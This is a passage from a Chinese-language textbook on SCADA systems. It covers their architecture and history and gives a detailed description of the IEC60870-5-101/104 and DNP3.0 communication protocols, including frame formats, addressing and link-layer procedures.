采集数据,并且大多数情况下都提供一种操 作接口用来显示信息和控制远程站点。在大型遥测系统中,分布式主站从远方站 点汇集信息并将这些信息中继给中央控制中心。 1.4 SCADA 系统软件 SCADA 软件分为两类,即专用的商用软件和开源软件。大型企业为其自身的 硬件系统定制开发专用软件,这类系统通常称为“总控键”解决方案。在工业自动 控制领域,“总控键”解决方案面临的最大问题是用户对系统提供商具有不可替代 性和巨大的依赖性。开源软件系统由于给整个系统带来了协同互操作性,从而得 到了广泛应用。协同互操作能力使得许多不同制造厂家的设备可以集成到同一个 大型系统中。 Citect 和 WonderWare 是在 SCADA 系统市场上普遍使用的两种开源软件包, 现在一些开源软件包还包括集成在SCADA 系统中的可管理软件资源。 SCADA 软件的主要元素包括: (1)用户界面; (2)图形显示界面; (3)告警模块; (4)趋势分析模块; (5)RTU ( 或 PLC)接口; (6)升级模块; (7)数据访问模块; (8)数据库; (9)网络模块; (10)纠错和冗余设计; (11)客户端/服务器的分布式处理流程。 1.5 SCADA 网络技术基础 1.5.1 SCADA 网络架构 1.5.1.1 SCADA 系统的发展历史 SCADA 系统常用于生产控制系统中。第一代“SCADA”系统通过测量仪表、 信号灯、条带录音机等采集数据,监视控制功能则由操作员手动操作各种球形手柄 完成。这类设备至今仍然在重型机械厂、加工车间和大型发电系统中完成监视控 制和数据采集功能。图1.2中传感器使用4~20mA 电缆连接控制面板示出了一 种控制面板连接传感器的结构。 传感器 图1.2 传感器使用4~20mA电缆连接控制面板 传感器连接控制面板型 SCADA 系统具有如下优点: (1)结构简单,没有 CPU、RAM、ROM 或可编程的软件; (2)传感器直接与控制面板上的仪表、开关和信号灯连接; (3)大多数情况下,用户在系统中增加一个类似开关或指示灯之类是简单和 低成本的。 但传感器连接控制面板型 SCADA 系统的缺陷也很突出: (1)当成百上千个传感器连接到控制面板后,电缆的数量变得难以管理; (2)所采集数据的数量和类型差异很小,变化缓慢 (3)随着系统规模的不断增大,安装新的传感器变得日益困难; (4)如果要对系统进行重新配置将变得特别复杂; (5)使用真实数据进行仿真将变得不可能; (6)仅能存储少量数据并且管理很困难; (7)不可能在远程对数据和报警进行监视; (8)需要工作人员全天24h 值守,并对控制面板和数据进行不间断观测。 1.5.1.2 现 代 SCADA 网络系统 现代制造和过程控制,采矿业,大型工程以及安全监管和生产中的工业遥感, 通常需要将大量远距离、分散的现场设备和控制系统连接起来,这种距离从几米到 数千千米不等。工业遥感通常用来传送指令、程序,并接收来自远距离生产现场的 监视信息。 SCADA 是指遥感和数据采集功能的集合。SCADA 包含现场信息收集,将现 场信息传回控制中心,执行各种必要的分析和控制,并将各种状态信息显示在许多 操作人员使用的显示器或屏幕上;而所需要的控制动作则可以传递回工业过程中。 早期的数据采集设备使用继电器逻辑器件控制生产过程和车间作业,随着 CPU 和其他电子设备的出现,SCADA 系统制造商将数字电子元器件集成作为继电 器逻辑器件的一部分。PLC 可编程逻辑控制器至今仍然是工业部门使用最广泛的控制系统之一。随着工厂车间监视和控制更多设备的需求不断增长,PLC 变成了 分布式的,并且系统变得越来越智能化、小型化。PLC 和 DCS(分布式控制系统) 被工业界以图1.3PC 使用工厂总线或传感器连接 PLC 或 DCS 所示的形式使用。 图1.3 PC 使用工厂总线或传感器连接 PLC或 DCS PLC/DCS 型 SCADA 系统的优点如下: (1)计算机可以记录并存储海量数据; (2)数据可以用户要求的任何形式显示; (3)地域分布很广的成千上万只传感器可以被连接到同一个系统中; (4)操作人员可以在系统中进行实时数据模拟; (5)多种类型的数据可以通过 RTU 进行收集; (6)数据可以在任何地方查看,不一定非要在工业现场才能看。 PLC/DCS型 SCADA 系统的缺点如下: (1)PLC/DCS 型 SCADA 系统比传感器连接控制面板型 SCADA 系统更复杂; (2)开发PLC/DCS 型 SCADA 系统需要多种不同的技术人员,如系统分析员 和编程开发员; (3)如果连接成千上万个传感器,仍然需要很多线缆; (4)操作员仅仅只能看到 PLC 层次的内容。 随着工业界对小型化、智能化系统需求的不断增长,新型传感器越来越多地使 用智能 PLC 和 DCS。这些设备称为IED(智能电子装置)。IED 通过Profibus、De- viceNet 或 Foundation Fieldbus 等现场总线与 PC机相连,如图1.4所示。这种智能电子装置具有足够的智能处理能力来获取数据,与其他设备通信并具有独立的程 序模块。每一台这类超级智能传感装置的硬件主板上具有不只一种传感器。典型 的 IED 装置可以将模拟输入传感器、模拟输出、PID(比例—积分—微分)控制、通 信系统和程序存储器集成在同一个设备中。 图1.4 IED 使 用fieldbus 总线连接 PC IED使用 fieldbus 现场总线连接 PC 型系统的优点如下: (1)所需的连接线缆最少; (2)操作人员可以直接观测传感器层次的底层信息; ( 3 ) 从IED 获取的数据将包括类似串口数量、模型数量等现场设备自身配置 的参数; (4)所有装置支持即插即用,所以安装和更换零件很容易; (5)更小型化的装置意味着将为数据采集系统节省更多空间; (6)IED 使用fieldbus 总线连接 PC型系统的缺点; (7)越先进的系统需要更多受过良好教育的用户; (8)传感器的成本很高(但这部分成本可以由PLC产品淘汰抵消); (9)IED 的可靠性更多依赖于通信系统。 另外,通信技术的快速发展推动工业 SCADA 系统中应用很多新技术。 1)SCADA 网络主站系统中广泛应用局域网技术。双冗余设计局域网(LAN) 所能提供的高可靠性,使局域网逐渐成为主站系统中的重要组成部分,高速局域网 同时也提供了快速响应时间。 2)用户操作界面。新一代工业 SCADA 系统出现的用户操作界面具有以下显 著提升: (1)视频显示装置的图形显示能力得到显著提高,操作人员可以针对整个 SCADA 网络的特定节点进行在线放大和规划工作; (2)显著提高了操作人员的响应时间; 3)远程终端单元。 (1)将数据处理过程分散至各个 RTU 节点设备,而不是完全集中在主站 系统; (2)将数据采集过程分散至各类远程智能装置,这些装置利用通信网络将数 据传送回 RTU 中 (3)RTU 的其余部分或功能模块可以很容易通过 I/O,CPU, 供电等进行 装配; (4)在多主站的多路通信网络环境中,每一台主站系统使用独立的数据库与 其他站点完成通信; (5)用户开发的程序可以在 RTU 中运行,以此减少与主站通信过程中的流量 告警信息数量(通过合并、过滤不相关的告警信息实现); (6)对接收到的实时数据的有效性进行校验; (7)RTU 内部网络通信(数据并不都经过主站); (8)RTU 设备上有精心设计的人机交互界面可以直接对RTU 设备进行操作 配置。 4)通信信道 工业 SCADA 系统中,主站系统和 RTU 之间的通信使用开放的协议标准,其通 信信道主要有以下几类: (1)光纤通信——低成本和易操作是光纤通信的突出优势; (2)扩频卫星通信——使用改良的、低成本和低功耗的方法通过卫星系统传 送数据给远程的 RTU 设备; (3)流星余迹通信——在卫星通信成本很高的场合,这是一种较为经济高效 的技术手段。 1.5.2 工 业 SCADA 系统网络的专用协议 1.5.2.1 工 业 SCADA 系统网络协议简介 工业无线通信和遥测系统中常用的协议包括 HDLC、MPT1317 和 Modbus 协 议,以及 CSMA/CD 协议。 主站系统和 RTU 装置之间使用时分复用机制双向信息传送,这种机制的基础 是串行数字化报文。这些报文必须高效、安全、灵活以及在软件和硬件之间方便 传输。 通常报文分成三个基本组成部分: (1)同步报文:提供发端和收端信号同步的能力。 (2)信息报文:在发送端将数据进行编码,使得接收端能对信息进行解码并使 用信息。 (3)正确性校验报文: 一种报文安全校验机制,报文安全校验机制检查数据的 逻辑操作及成分,因而在所传输的数据包中含有预先定义好的校验比特位。在接 收端,同样的操作在所接收的数据中执行一遍,并且将收到的校验比特位进行比 对。如果是相同的,数据被正确接收下来;否则,请求重传消息的报文将发送出去。 典型的报文的结构如图1.5所示。 图1 . 5 典型的报文格式 报文组织包括以下三个要素: (1)8ms (最少的情况)的预定义传送标记,用来准备接收 modem 端的比特 (bit)同步; (2)同步机制:由两比特组成; (3)RTU 地址机制:该机制使得接收端可以从所有 RTU 发送回来的报文中准 确选择那些发送给该接收端的报文,以此来避免报文被发送给错误的 RTU, 整个 网络系统中的每一个 RTU 设备有自己独立的地址。 报文中的信息域包含20位(bit), 其中的8位是功能码,12位是数据位。对于 远方到主站的报文,图1.5所示的报文表示整个会话报文序列中的第一个报文,直 接紧跟第一个报文后的其他报文使用同一个 RTU 地址传输信息和功能码空间,可 以传送24位数据。这24位数据可以包含2个独立的12位数值或者24种设备 状态。 报文结束字段包括: (1)BCH 码包含5个比特位,接收端用BCH 码检测报文中可能存在的差错。 如果检测到一个错误,原报文将被重传。 (2)报文结束标志,整个报文的最后一位是结束标志。通过报文结束标志,另 一个报文可以立即跟随上一个报文发送。 图1.5所示的报文结构的第一个报文的效率为12/32或37.5%,后续报文的 效率为24/32或75%,这种效率是异步传输模式中的基本特点。BCH 码的5个比 特位可以检测所有单比特、双比特随机错误和所有5位或少于5位的突发错误, BCH 码机制通过牺牲很低的效率来确保有效的纠错机制,从而为报文的安全性提 供保障。另一种工业控制设备制造商广泛使用的报文编码机制是几何编码,几何 编码在每一个字节中使用并在一个报文中的所有字节中的相应位置使用。几何编码可以检测所有单比特、双比特和三比特错误以及所有单字节长度或少于单字节 长度的突发错误(通常是16位)。纠错编码还需要对那些由非正常的报文同步过 程引起的错误进行保护。通常异步机制需要利用占空位比特变化来标识报文的起 始位置,错误的起始位将导致在一个由噪声突变引发的报文之前出现许多空比特 位。解决该问题的一种方法是被称为 syncslip的机制,该机制将报文中的所有比 特位进行翻转(反码),以此提供保护能力,等同于那种对每2“位比特中出现由于 未检测出差错而发生的同步错误的保护能力,n 等于安全编码的比特位数,长纠错 编码使用syncslip方法提供更好的保护。 1988年国际电工委员会(International Electrotechnical Commission,IEC)开始出 版 “IEC 870遥控装备和系统专用协议”的国际标准,其中有一部分是“第五章传 输协议”。整个出版过程以分阶段形式进行,1990年到1995年,陆续出版了整个 协议的很多子集,进而完整定义了SCADA通信的开放协议体系。IEC 870 协议定 义了开放系统互连(OSI) 参考模型中最少的层次结构:物理层、数据链路层和应用 层,包括对数据链路层报文结构的详细定义以及应用层数据结构的集合,设备制造 商可以利用该协议研发新系统并具有网络互连能力。新制定的IEC 协议加上了 数字前缀“60”,因此目前 IEC 定 义 的 传 输 协 议 标 准 是 IEC60870.5。 IEC60870.5 协议最初是为电力系统的控制和信息通信而制定的,该协议专门为 电力系统应用设计了很多相应的数据结构。尽管IEC60870.5 协议包括的很多 通用数据类型可以应用于其他领域的SCADA应用,但IEC60870.5 协议主要广 泛应用于电力工业。 就在 IEC870协议不断出版的时期,DNP3.0(Distributed Network Protocol 3.0, DNP)协议在北美得到了发展并出版。DNP3.0 协议是由GE Harris 控制公司分布 式自动化部门在1990年初开发的开放系统协议,并于1993年11月由DNP3.0 用 户组出版。该通信标准定义主站和 RTU 之间的通信以及其他智能电子装置间的 通信。开发该协议的初衷是实现电力、石油/天然气、污水处理/供水工程以及化学 工业控制系统的互操作性。DNP3.0 协议被工业界认为具有特殊的柔性或鲁棒 性,除具有全面而详细的数据对象库,DNP3.0 协议还具有严格的标准一致性,这 种一致性是由DNP3.0 协议详细定义的每种设备必须严格遵守的执行规则而建立 起来的。DNP3.0 协议的一致性为设备制造商提供了仅需研发最简化的功能系统 就能达到设计能力的方法。 伴随 DNP3.0 协议在美国配电系统的出现,DNP3.0 协议获得了能源地质与工 业应用领域的广泛支持。DNP3.0 协议在北美、南美、南非、亚洲、澳洲和新西兰等 国的电力工业、供水工程以及其他工业领域拥有大量的用户和研究团队。DNP3.0 协议和在欧洲广泛使用的 IEC60870-5 协议形成了分庭抗理的局面。但是, IEC60870-5 协议主要为配电工业领域设计,而 DNP3.0 协议可以在石油/天然 气,污水处理/供水工程以及医疗化学工业控制系统中广泛应用。 DNP3.0 协议和IEC60870-5 协议都是为 SCADA 系统应用而专门设计的,这 类应用主要指物理隔离的计算装置之间的信息采集和控制命令传送,并且传送过 程被设计成通过可靠的方式传送相对较小的数据包方式实现,而这些数据包到达 的顺序具有确定性和可预测性。从这个意义分析,DNP3.0 和 IEC60870-5 协议 不同于其他常规通信协议,如TCP/IP 协议簇中的 FTP协议,尽管 FTP 协议可以传 送超长文件,但 FTP协议数据包到达的先后顺序是随机的,并不适用于SCADA 系 统的过程控制中[2]。 DNP3.0 协议和 IEC60870-5 协议的主要优点如下: (1)开放性协议,适合任何设备制造商或用户使用; (2)专门为数据和控制命令的可靠通信而设计; (3)得到来自工业 SCADA 网络的主站系统、软件、RTU 以及IED 等设备制造 商的广泛支持。 1.5.2.2 IEC60870-5-101 协 议 1)协议简述 IEC60870-5 是由国际电工委员会或 IEC 制定的一个标准集合,目标是为 SCADA 系统的遥控和远程信息采集过程提供一个开放性标准。 IEC60870-5 标准最初主要为电力工业制定,其定义的数据对象也主要提供 电力工业应用,但也不仅仅局限于电力工业,因为标准中的数据对象也适合其他工 业系统中的 SCADA应用。IEC60870-5 协议在最初阶段主要应用于欧洲国家的 电力工业。 IEC60870-5 标准集于1995年制定完成,并最先以IEC870-5-101 协议发 布时,仅包含通过较低带宽比特字符串通信电路的传输过程。随着网络通信技术 的快速发展,IEC60870-5 标准目前也支持使用TCP/IP 网络协议通信。 2)系统拓扑 IEC60870-5-101 协议或 T101,支持基于低带宽比特字符串的点对点和多址 通信连接,并在数据链路层提供非平衡或平衡通信模式。 在非平衡通信模式,只有主站可以通过传送初始化数据帧的方式初始化通信 过程,该方式大大简化了系统设计过程,因为在这种情况下就不需要考虑如何避免 报文碰撞问题,所有的通信过程都由主站的请求初始化,例如请求那些已准备好的 用户数据。 平衡通信模式也是 IEC60870-5-101 协议允许的方式,但该种模式只能工作 于点对点通信连接。IEC60870-5-101 协议支持从站发送未经请求/主动提供的 数据报文,但在多点通信网络中却不支持从站发送未经请求的数据报文,从站必须 遵循周期轮询机制。 平衡通信模式仅限于点对点的通信连接,其特点如下: (1)通信双方都可以初始化传输过程; (2)通信系统的更高效的利用率; (3)由于两个站点都可以同时发送数据,于是报文碰撞问题不可避免,需要设 计特殊的报文碰撞避免和恢复机制; (4)仅限于IEC60870-5-101 协议在点对点通信连接中使用。 适用于多点通信连接的非平衡通信模式具有以下特点: (1)只有主站可以发送初始化数据帧; (2)不需要设计特别的数据包碰撞避免机制; (3)从站的数据链路层功能设计简单。 使用IEC60870-5 协议通信的网络具有主从关系,因此对于任意两个互相通信 的站点,其中一方是控制站点,另一方是受控站点。也可以定义为“监视方向”和“控 制方向”,那些从生产控制现场产生的模拟量等监视数据将通过监视方向传送,而那 些控制指令则通过控制方向传送。如果一个站点同时传送监视数据和控制指令,它 将同时扮演控制站点和监视站点的角色,也就是复合操作模式,IEC60870-5 协议允 许使用该模式,但要求使用应用服务数据单元(ASDU)中定义的初始地址。 3)报文结构 IEC60870-5-101 协议的数据帧报文主要是由承载连接地址和控制信息的 数据链路帧构成,其中专门设计了个标志标识一级用户数据是否准备就绪,且是否 具有可选的应用数据。每个数据帧可以装载一个 ASDU 的最大容量的数据, 图1.6所示为传输帧格式,应用层的 ASDU 数据在传输帧中承载。 如果数据帧中不包含用户数据,则可以使用固定帧长数据帧格式,如图1.7所 示,或者单字节的报文,将极大地提高通信带宽利用效率。 图1 . 6 IEC60870-5-101 协议报文结构 单字节控制报文 (十六进制) 图1 . 7 固定帧长和单字节报文 4)寻址方式 IEC60870-5-101 协议的寻址过程是在数据链路层和应用层进行的,非平衡模式通信的数据链路层地址域包含1个或2个8位字节,平衡模式通信的数据链 路层地址域含0,1,2个8位字节。平衡模式通信方式一般是点对点的通信,链路 地址字段也许是多余的,但为了安全一般厂商都保留。链路地址字段OXFF或 OXFFFF 是广播地址,可以标识链路层的所有通信站点。 在应用层,ASDU 字段通常包含1个或2个8位字节的地址,该地址字段在 “控制方向”表示控制站的地址,在“监视方向”表示受控站的地址。ASDU 地址与 数据本身所含有的信息对象地址合在一起表示每个数据元素的独特地址。 在 DNP协议中,每一个装置可能会对应不止一个逻辑或通用地址。在数据链 路层,0XFF或 OXFFFF地址通常被定义成广播地址。所以,如果要发送一个广播 报文,则发送端需要在数据链路层和应用层地址域都包含广播地址。 对于任意一个单系统而言,ASDU 中可以包含起始地址,这种情形在图 1.6IEC60870-5-101 协议报文结构中并没有显示出来,该字段是报文的传送原 因字段中的可选部分。 信息对象地址字段的长度是1~3个8位字节,可以在 ASDU 中仅包含一次, 或在 ASDU 的每个独立的信息对象中都包含,这种机制有利于连续信息数据的分 块、高效传送。 5)协议版本 IEC60870-5 协议有两种不同的传送报文的方法,这是两种截然不同但又互 相联系的协议。第一种是IEC60870-5-101 协议或 T101,提供在低带宽信道进 行串行比特通信的能力,该方法使用图1.6所示的链路帧格式及其定义的在通信 网络中传输数据的过程。 第二种方法是最近几年才制定的IEC60870-5-104 协议,或T104 规范,该协 议的最低几层主要是TCP/IP 协议的传输层和网络层协议。该协议提供通过局域 网或广域网传输如图1.6所示的ASDU 的能力。IEC60870-5-104 协议的结构, 或“协议栈”如表1.1所列。 表1.1 IEC60870-5-104 协议的协议栈 分层 源 选 项 用户进程 IEC 60870-5-101 程序函数 应用层 IEC 60870-5-101 ASDU和应用信息元素 传输层 TCP/IP网络传输协议 网络层 链路层 物理层 IEC60870-5-101 协议对其协议栈的从上到下部分,直至物理层都作了完整 定义,而IEC60870-5-104 协议中却并未如此,IEC60870-5-104 协议允许使用现有的多种物理层和数据链路层协议。 除去数据报文的传输层的工作过程完全不同外,IEC60870-5-101 和 IEC60870-5-104 协议对应用层和用户层的定义基本一致,其他特殊的差异在于 对时种同步和广播报文的处理方面。 6)应用数据对象 IEC60870-5 协议的信息对象字段定义的信息内容普遍用于所有 SCADA 系 统,尤其适合电力系统。每种不同类型的数据有一个特殊类型的标识数据与之对 应,在一个 ASDU 中只能包含一种类型的数据,数据类型在如图1.6所示的ASDU 的第一个字段定义。 信息对象类型使用传送方向和信息类型进行分类,如表1.2所列。 表1.2 信息对象类型分组 组 监视方向的实例 控制方向的实例 进程信息 一个可测量的变量,比如: 一位 或者一模拟量 一个控制命令如:设置比特位或者地址值 系统信息 初始化信号结束 查询命令,重启进程命令 参数 设置过滤时间 文件传输 读数据文件,写配置文件 7)互操作性 IEC60870-5 协议的互操作性是通过一份10页长的互操作说明实现的,该说 明对所有不同的操作模式、配置选项、ASDU、传送原因以及其他对于确保通用性非 常重要的信息进行了统一说明。 由于IEC60870-5 协议中有关数据类型和数据寻址能力的数据结构相对简 单,互操作说明方法非常适用。将控制站对受控站执行的操作进行一致性校验,并 确保支持全部会话应用所需要的数据类型是非常必要的。 1.5.2.3 DNP3.0 协议 1)概述 分布式网络协议(DNP) 是一种在电子和能源工业领域广泛使用的数据采集 标准协议,该协议的初衷是满足工业 SCADA 系统开放、互操作和使用简单的应 用需求。分布式网络协议使用主站/从站轮询的办法接收和发送信息,而且有时 在同一系统中也使用候补主站(子主站)。协议的物理层通常设计为使用 RS- 232(V.24), 但有时也支持其他物理层标准如 RS-422、RS-485 甚至光纤信道。 在工业 SCADA 系统领域,DNP协议得到了业界和厂商的广泛使用,并已基本成为 事实上的数据采集和控制标准。 2)协议的互操作性 DNP 协议是针对电力、石油、天然气、和污水/供水工程以及化学工业等领域专门设计的、具有互操作性的协议。作为一种工业数据采集方面的协议标准,具有 同时和许多终端设备及装置的通信接口的能力。通过规范的操作流程,DNP 协议 确保不同的设备制造商可以研发基于 DNP 协议的设备,从而也保证终端用户采购 DNP设备时的合法权益。随着越来越多的工业设备制造商生产DNP标准设备,终 端用户的选择和信心也随之增加。 3)协议的开放性 DNP 协议设计的出发点是一种完全开放的标准。由于 DNP 协议不属于任何 一个独立的公司所有,这就意味着设备制造商拥有平等的竞争平台,不同的设备制 造商有同等的机会修改协议。此外,DNP 协议的开放性还将大大降低系统的研发 成本,且设备制造商没有必要自行研发 SCADA 系统的所有模块。而在那些私有 的、封闭开发的系统中,设备制造商通常不得不独立设计和研发 SCADA 系统中的 所有模块,尽管其中的一些模块并不见得有利润。这一开放性,使一个设备制造商 只需专门从事少数模块(产品)的研发,并依靠此形成其核心业务。 4)物理层 DNP 协议的物理层使用8位数据比特位的异步串行比特机制,该机制通常有 1位起始比特,1位停止比特,且没有奇偶校验,同步或异步模式都可以。DNP 协 议的物理层有两种工作模式,直接模式(点对点)或串行总线模式(点对多点),这 两种模式不能同时使用,两种模式都可以半双工或全双工模式工作,在任一种模式 下,必须使用载波侦听机制。DNP 协议是一种改良型的主站/从站系统,整个系统中 可以允许有多个主站,但任何一时刻只有一个主站装置在运转,在整个网络系统中不 可避免地存在碰撞,物理层的配置中定义了报文冲突碰撞躲避和冲突恢复的方法。 DNP 协议可以从工作于多主站模式的网络中区别出各个设备的优先级顺序。 5)物理拓扑 DNP 协议支持5种通信模式,双线制的点对点、双线制的点对多点、四线制的 点对点、四线制点对多点以及拨号调制解调器。那种只有主站和从站两个节点的 系统称为直连型总线,如果系统是多节点对多节点的通信模式,称为串行总线,如 图1.8所示。这两种系统都可以使用双线制和四线制的通信模式。双线制方法仅 能工作在半双工模式而四线制方法可以工作于全双工或半双工模式。DNP 协议 支持多主站,多从站和点对点通信。 图1 . 8 直连和串行模式 6)工作模式 (1)双线制点对点通信。如图1.9所示,DNP协议的物理层支持点对点通信, 双线制使用的半双工模式通常使用 RS-485 或双线制调制解调器作为物理层设 备,如果要使用调制解调器,其接口通常使用V.24ITU 的标准(RS-232) 。DNP 协议的双线制工作模式不支持全双工通信制,仅支持半双工模式,在点对点工作模 式并不存在报文碰撞的可能性,主站发送数据帧,从站就立即响应,唯一需要考虑 的问题就是由于报文传播延迟而导致响应时间的滞后,DNP 协议初始化过程已经 注意到了这种滞后时间。 主 RS-232 PC或者 PLC RS-232/调制解调器 RS-232/RS485 适配器 RS-232 光纤适配器 RS-232/调制解调器 RS-232/RS485 适配器 RS-232 光纤适配器 图1 . 9 双线制直连模式 (2)双线制多点通信。DNP 协议物理层支持多点通信。双线制多点模式,如 图1.10所示,通常使用RS-485 接口、光纤或 Bell 202 调制解调器作为物理设备。 DNP 协议的双线制工作模式不支持全双工通信体制,仅支持半双工体制,在双线 制多点通信模式将存在报文碰撞问题,这是由于在该模式中,两个主站或从站同时 访问通信信道的可能性非常大。为了克服这个问题,DNP 协议在载波损耗之后设 计了一个时间延迟,载波是某时刻有通信会话方同时在双线信道中传送信息的信 号。在双线多节点通信模式,所有的通信设备必须有办法知道某一时刻有通信节 点正在使用信道传输数据。 图1 . 10 双线制多点通信模式 (3)四线制点对点通信。DNP 协议还可以使用四线制点对点技术体制来完 成主站和从站之间的全双工通信,如图1.11所示。物理层标准使用 RS-422、 RS-232 和四线制的调制解调器,由于该类调制解调器是点对点工作模式,因此不 存在碰撞问题。但是,V.24 体制被用做通信系统中的握手机制,包括 DCD(数据载波侦听),通信过程中的传播延迟是允许存在的,通信双方的设备正好可以利用 这种延迟检测载波的丢失。四线制通信体制真正实现了全双工通信,但实际在工 程应用中很少完整应用。 图1 . 11 四线制直连通信模式 (4)四线制多址通信模式。DNP协议允许四线制的多址通信模式,如图1.12 所示。该模式可以使用半双工或全双工通信体制,而全双工模式很少使用,原因在 于全双工模式要避免碰撞情况,处理起来很麻烦。在实际情况下,网络中同时存在 多个设备进行双向通信是很难实现的。网络中只有一台主站系统很容易处理“碰 撞”问题,但是如果出现当从站还没来得及响应;另一台正常主站系统却要使用网 络时,就可能出现“碰撞”问题。在这种情形中,从站处理“碰撞”可能有遇到许多 难点,因为与此同时,从站也需要立即响应其会话过程中的那个主站系统。DNP 处理这类“碰撞”问题的一种途径是允许“碰撞”发生,确保主站可以发送更高优先 级的数据包[3]。 图1 . 12 四线制串行通信模式 (5)拨号调制解调器。DNP协议支持使用拨号调制解调器,如图1.13所示, 该模式是一种点对点环路模式,通常使用V.24 通信体制(RS-232), 并以多种形 式使用 DCD 技术,因为调制解调器中的载波侦听仅仅意味着该链路已建立起来, 而并非数据已经传送。调制解调器将 CTS 标志设置成高电平状态,并以此提示 DTE 端可以发送数据了。本地终端没有办法告诉远程终端已经传送完数据,只有 依靠远程终端侦测数据已经开始发送。 公共交换电话网 RS-232 PC或者 PLC 调制解调器 调制解调器 设备 图1 . 13 电话拨号调制解调器模式 7)数据链路层 DNP协议的数据链路层定义数据帧的结构特征、长度和内容,如图1.14所 示 。DNP协议使用8位字节规定,并使用十六进制数作为数据帧语言,数据帧组 织形式如下所示。 (1)数据帧结构形式: Start(2 个8位字节)0X0564 (0000010100100000) Length(1 个8位字节)5 to 255 (DECIMAL) Control(1个 8 位字节)包含功能码 Destination(2个8位字节) Source(2 个8位字节) CRC(2 个8位字节)用于长度、控制、目的地址和源地址 User Data(16 个8位字节) CRC(2 个8位字节)用户数据 更多用户数据(16个8位字节) CRC(2 个8位字节)仅对用户数据完成校验 更多用户数据(1或者16位字节)变量 CRC(2 个8位字节) END 图1 . 14 DNP 数据包形式 注意:数据包中的用户数据可以一直填充至达到最大8位字节数限制,这是由 长度8位字节字段决定的。数据长度的最大8位字节数是255个,最少是5个,协 议规定数据帧中的最后一个用户数据块少于16个8位字节。协议数据帧中的每个 CRC 是针对用户数据计算出来的,而并非整个数据帧。 (2)功能码。控制字段的8位字节,其中有4比特用来标识数据连接过程如 何处理整个数据帧,有6类基本的功能码: ① 重置。该功能码字段用来同步主站和从站的新的传送确认过程。 ② 用户过程的重置。重新设置用户数据连接过程。 ③ 测试。测试指令用来测试从站数据连接的状态。 ④ 用户数据。用户数据功能字段用来给从站发送确认数据包。 ⑤ 未确认用户数据。未确认用户数据字段给从站发送不需要用户确认返回 的用户数据。 ⑥ 数据连接状态请求。数据连接状态请求报文用来请求从站的数据连接 状态。 (3)传送过程例子。 ① 从站连接重置。如图1.15所示,主站向从站发送“发送—确认一重置”数 据帧,从站接收到该数据帧报文并使用ACK确认数据帧响应。 Reset (REQ) SEND FCB=0 Expected FCB=X (IND) CONFIRM Positive Next FCB=1 图1 . 15 从站连接重置 ② 用户过程重置。如图1.16所示,主站向从站发送“发送—确认一重置”用 户过程数据帧,从站接收该数据报文并使用ACK确认数据帧响应。 Reset User (REQ) SEND (IND) Positive 图1 . (IND) Reset User 16 用户过程重置 ③ 发送/确认用户数据。如图1.17 所示,指定主站系统充当初始化站点向那 种完成从站功能的非主站型接收站点发送“发送—确认”数据帧,这是FCV 标志在 连接过程已经被重置、且发送数据帧中的FCB=1 后变为有效的第一个数据帧。 从站总是在等待数据帧的FCB 标志位变成1,因为这是连接过程重置后的第一帧 Station A Station B (REQ) SEND FCB=1 Expected FCB=1 (IND) Positive CONFIRM (IND) Data 图1 . 17 发送/确认用户数据 数据,并将发送确认帧。主站端接收到该确认数据帧后,缺省就认为数据报文已经 正确接收并表明已经连接正确的主站数据用户。 ④ 发送/不需确认用户数据。如图1.18所示,主站或非主站型初始化站点给 从站或非从站发送三个数据帧,数据帧发送完成一定时间后,就表示初始化站点向 数据连接用户传输数据操作已正常执行,从站接收到第一个有效数据帧后,就意味 着接收数据正常。 (REQ) Delay (REQ2) Delay (REQ3) SEND 未回复 →(IND) 用户数据实证 延时到下次frame=t时以B的身份发送消息 SEND 未回复 SEND 未回复 图1 . 18 发送不需确认型用户数据 ⑤ 发送/NACK 回复型用户数据帧。在图1.19Send/NACK 用户数据中,非主 站型初始化站点向从站发送一个数据帧,当接收方接收到第一个确认帧后,表明数 据连接过程已经正确建立,初始化站点开始向从站点发送第二个数据帧。这时从 站点将不能再接受其他数据帧,并向初始化站点发送 NACK 数据帧。初始化站点 接收到 NACK 数据帧后,将中止数据传送过程并向数据连接用户发送当前状态忙 的信息。 ⑥ 请求/响应。在图1.20中,初始化站点连续向从站端发送数据帧。当从站 端数据处理能力达到极限,不能再接收数据帧时,确认数据帧中的DFC 位将反转。 初始化站点接收到该确认数据帧后,将停止向从站端发送数据,取而代之周期性地 向从站发送“请求—确认”数据帧,并以此获取从站的工作状态,从站端节点不断 利用当前状态标志“DFC”位响应“请求状态帧”。如果从站准备好能接收更多数 据,返回的“DFC” 位将是“0”,否则将是“1”。当初始化站点在响应数据帧中识别 图1.19 Send/NACK用户数据 图1.20 请求/响应用户数据 出 DFC 位变为“0”时,数据帧传送过程将重新开始。 8)伪传输层 DNP 协议并不完全支持 ISO 开放系统互连模型中定义的传输层,而是设计了 一种被称为超数据连接传输协议的伪传输层协议,原因在于DNP协议中数据连接 层的功能并不完全符合ISO 的 OSI模型中的定义,于是这些功能从数据连接层中 撤销并转移至伪传输层。这种数据连接功能由很多从传输服务数据单元(TSDU) 分解形成的、长度较短的连接服务数据单元(LSDU) 编队数据帧构成,连接服务数 据单元编队数据帧具有传输层控制信息。连接服务数据单元的最大尺寸是249个 8位字节,这种设计是通过缩短报文长度并以高传输错误概率设计来实现的。如 果数据帧传输过程发生错误,重传过程将立即开始,数据帧越短意味着重传过程将 越快。 9)应用层 DNP 协议通过定义大规模数据对象库、功能码、请求和响应设备的报文格式 来实现应用层,这些元素在 USER 层使用,并以此来构建最终的应用。当应用层定 义明确时,相应的数据对象、功能码和报文格式将随之形成,并构成数据帧的应用 层结构。完整的数据对象和功能码定义情况可以从 DNP3.0 标准协议文本中找 到 ,DNP3.0 协议可以从 DNP 用户组的官方网站 http://www.dnp.org 获取。其他 相关信息还可以从 GE Harris控制工程公司的官网 http://www.harris.com/harris/ search.html 获取。 1.5.2.4 IEC60870-5-101 与 DNP3.0 的比较 1)相同点 DNP3.0 和 IEC60870 协议在功能层次有很多相似之处,在很多技术细节方面 也有相同的特点,这种相似性来源于两种协议所能提供的功能和完成任务的相似 性。另一方面,两种协议也是从相同的技术基础框架发展而来的,并在报文数据帧 格式方面有许多相似之处。 DNP3.0 和 IEC60870 协议的共同特点: (1)数据传输过程的高安全性(DNP3.0 更突出些); (2)轮询和异常告警机制; (3)主动发送报文机制(如IEC60870-5-101 协议); (4)面向 SCADA 功能应用的对象数据定义; (5)时间同步机制; (6)时间戳机制; (7)数据冻结和清除计数器; (8)执行控制操作前的选择过程; (9)数据分组或分类; (10)文件上传与下载过程。 至少在功能层次,两种协议具有很多相似点。 2)不同特点 (1)寻址方式。 ① IEC60870-5-101 协议使用数据链路层地址和应用层地址; ② 